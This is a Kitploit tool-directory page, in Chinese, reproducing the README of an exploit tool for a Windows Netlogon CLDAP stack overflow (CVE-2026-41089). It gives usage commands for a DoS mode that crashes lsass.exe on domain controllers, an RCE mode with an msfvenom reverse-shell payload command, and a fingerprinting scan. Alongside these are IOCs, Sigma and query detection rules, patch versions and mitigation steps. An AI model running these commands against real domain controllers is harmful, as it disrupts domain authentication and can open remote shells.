Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-41089 — CVE-2026-41089 是 Windows Netlogon 服务中一个关键的远程代码执行漏洞,单包即可崩溃 lsass.exe,导致域控制器在约 30-60 秒内重启。此期间该 DC 的所有域认证将失败。 | Kitploit
工具/GitHubGitHub/hnytgl/cve-2026-41089
Vulnerability AnalysisExploitationPenetration TestingRemote Access ToolBinary Exploitation
GitHubhnytgl/cve-2026-41089

CVE-2026-41089

CVE-2026-41089 是 Windows Netlogon 服务中一个关键的远程代码执行漏洞,单包即可崩溃 lsass.exe,导致域控制器在约 30-60 秒内重启。此期间该 DC 的所有域认证将失败。

查看仓库
1412223天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-41089 — Windows Netlogon CLDAP Stack Buffer Overflow RCE Exploit

CVE-ID: CVE-2026-41089
CVSS: 9.8 (Critical)
CWE: CWE-121 (Stack-based Buffer Overflow)
攻击向量: UDP/389 (CLDAP SearchRequest)
影响: 远程代码执行 (RCE) / 拒绝服务 (DoS)
受影响版本: Windows Server 2012 R2 ~ 2025 (Domain Controllers)
补丁: 2026年5月累积更新

漏洞概述

netlogon.dll 中的 NetpLogonPutUnicodeString 函数在处理 CLDAP 搜索请求时存在栈缓冲区溢出漏洞。该函数接收字节长度预算,但将其解释为 WCHAR 计数,导致写入量是预期的 2 倍。

溢出发生在 NlGetLocalPingResponse 函数的 528 字节(264 ushort) 固定栈缓冲区中。攻击者可控的 User 字段加上服务器自身的 DNS 域名共同填充此缓冲区,最终覆盖 GS 安全 Cookie,导致 __report_gsfailure 和 lsass.exe 崩溃。

触发条件

  • CLDAP SearchRequest 中 NtVer=0x02(强制使用旧的、存在漏洞的 BuildSamLogonResponse 路径)
  • User 字段长度 ≥ ~130 个字符(二进制上限约为 260 字节 UTF-16)
  • 服务器 DNS 域名长度 ≥ ~80 个字符(域名越长,越容易达到 Cookie)

注意: NtVer=0x16(许多公开检测脚本使用的值)会触发安全的 BuildSamLogonResponseEx 路径,不会触发漏洞。

功能

模式描述
--mode dos发送精心构造的 CLDAP 包,导致 LSASS 崩溃,DC 重启(~60 秒认证中断)
--mode rce尝试远程代码执行(研究级,需要 shellcode)
--mode scan扫描不同 NtVer 值的响应情况,对目标 DC 进行指纹识别
--mode auto自动检测并选择最佳攻击策略

DoS 模式

单包即可崩溃 lsass.exe,导致域控制器在约 30-60 秒内重启。此期间该 DC 的所有域认证将失败。

# 基本用法 — 发送 3 个包
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode dos

# 单包快速攻击
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 1

# 激进模式 — 5 个包并发
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 5 --delay 0.1

RCE 模式

⚠️ 研究级 — 在实际环境中不可靠且不稳定。

RCE 面临以下挑战:

  1. 溢出数据是服务器自身的 DNS 名称,而非攻击者的 shellcode
  2. GS Cookie 必须绕过(需要信息泄露原语或暴力破解)
  3. Server 2022+ 上的 CET/ACG/CFG 使传统 ROP 更加困难
# 生成 shellcode
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 \
         -f raw -o shellcode.bin

# 发送 RCE 链路
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode rce \
    --shellcode-file shellcode.bin --lhost 10.0.0.5 --lport 4444

扫描模式

# 对目标 DC 进行指纹识别
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode scan

预期输出示例(已修补目标):

NtVer=0x00000002 → RESPONDED (3 ms)
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

预期输出示例(未修补目标):

NtVer=0x00000002 → TIMEOUT (5001 ms)    ← LSASS crashed!
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

如果 NtVer=0x02 超时而其他版本正常响应,则目标很可能存在漏洞。

高级参数

参数描述默认值
-l, --user-len用户名字段长度(ASCII 字符数)180
--ntverNtVer 值(十六进制,如 0x02)0x02
--count发送的 DoS 包数量3
--delay包间延迟(秒)0.5
-t, --timeout套接字超时(秒)5.0
--json输出 JSON 格式结果—
--raw发送前打印原始包十六进制—
--quiet抑制横幅输出—
--shellcode-file自定义 shellcode 文件(原始 x64)—
--lhost反向 Shell 监听地址—
--lport反向 Shell 监听端口4444

搭建测试环境

# 在 Windows Server(未修补)上创建长域名 DC:
# 1. 提升为域控 (DNS 域名很长的域名,例如 "this-is-a-very-long-domain-name-for-testing.corp.local")
# 2. 确认已安装 2026 年 5 月之前的补丁
# 3. 从攻击机运行:
python CVE-2026-41089-exp.py <DC_IP> <LONG_DOMAIN_NAME> --mode dos --count 1
# 4. 观察 DC 崩溃和重启

入侵指标 (IOCs)

网络

  • UDP/389 上 User > 100 字节且 NtVer = 0x02 的 CLDAP SearchRequest
  • 从非域控主机发往 DC 的异常 CLDAP 流量

主机

Event ID: 1000
Faulting process: lsass.exe
Faulting module: netlogon.dll
Exception code: 0xc0000409 (STATUS_STACK_BUFFER_OVERRUN)

检测规则

index=wineventlog source="WinEventLog:Application" EventID=1000
  Process_Name="lsass.exe" Exception_Code="0xc0000409"
Event
| where Source == "Application" and EventID == 1000
| where RenderedDescription contains "lsass.exe"
| where RenderedDescription contains "0xc0000409"

补丁信息

Windows Server 版本修补版本号备注
Server 20126.2.9200.26079ESU
Server 2012 R26.3.9600.23181ESU
Server 201610.0.14393.9140
Server 201910.0.17763.8755
Server 202210.0.20348.5074
Server 2022 23H210.0.25398.2330
Server 202510.0.26100.32772

检测与修复指南

快速检测(非破坏性)

# 安全检测脚本 — 不会崩溃目标
python detect_CVE-2026-41089.py <DC_IP> <DOMAIN>

# JSON 输出(适合批量扫描)
python detect_CVE-2026-41089.py 10.0.0.10 corp.local --json

# 显示补丁验证步骤
python detect_CVE-2026-41089.py 10.0.0.10 corp.local --check-patch

检测原理:发送 NtVer=0x02(触发漏洞路径)和 NtVer=0x16(安全路径)的短 CLDAP 请求。若 0x02 超时但 0x16 正常响应,则目标很可能存在漏洞。

修复步骤

  1. 立即安装补丁:2026 年 5 月累积更新(KB5058405 或更高)

    # 检查已安装更新
    Get-HotFix | Where-Object {$_.InstalledOn -gt '2026-05-01'}
    
    # 安装最新更新
    Install-WindowsUpdate -AcceptAll -AutoReboot
    
  2. 验证 netlogon.dll 版本:

    (Get-Item C:\Windows\System32\netlogon.dll).VersionInfo.FileVersion
    # 对照上方补丁版本号表
    
  3. 临时缓解(无法立即打补丁时):

    • 在防火墙限制 UDP/389 入站,仅允许可信网段访问 DC
    • 部署 IDS 规则检测异常 CLDAP 请求(User 字段 > 100 字节 + NtVer=0x02)
    • 启用 Credential Guard 和 HVCI 减少 RCE 影响
  4. 事后排查:

    # 检查 lsass 崩溃记录
    Get-WinEvent -FilterHashtable @{LogName='Application';Id=1000} |
      Where-Object {$_.Message -match 'lsass.exe' -and $_.Message -match '0xc0000409'} |
      Select-Object TimeCreated, Message -First 5
    

Sigma 检测规则

title: CVE-2026-41089 Netlogon CLDAP Overflow Exploitation
id: cve-2026-41089-netlogon-crash
status: experimental
description: Detects lsass.exe crash caused by netlogon.dll stack buffer overflow
logsource:
    product: windows
    service: application
detection:
    selection:
        EventID: 1000
        Image|endswith: '\lsass.exe'
        ExceptionCode: '0xc0000409'
        FaultingModule|endswith: '\netlogon.dll'
    condition: selection
level: critical
tags:
    - attack.impact
    - attack.t1499
    - cve.2026-41089

法律声明

本工具仅用于 授权安全评估、渗透测试、CTF 竞赛和防御研究。在未获得明确书面授权的情况下,对任何系统使用本工具均属非法。使用者自行承担一切法律责任。

参考链接

  • Microsoft Security Update Guide: CVE-2026-41089
  • NVD: CVE-2026-41089
  • Kudelski Security Research — Netlogon Stack Buffer Overflow Analysis
  • SecPod Analysis — IOCs and Detection
  • IONIX Threat Center — CVE-2026-41089
下载工具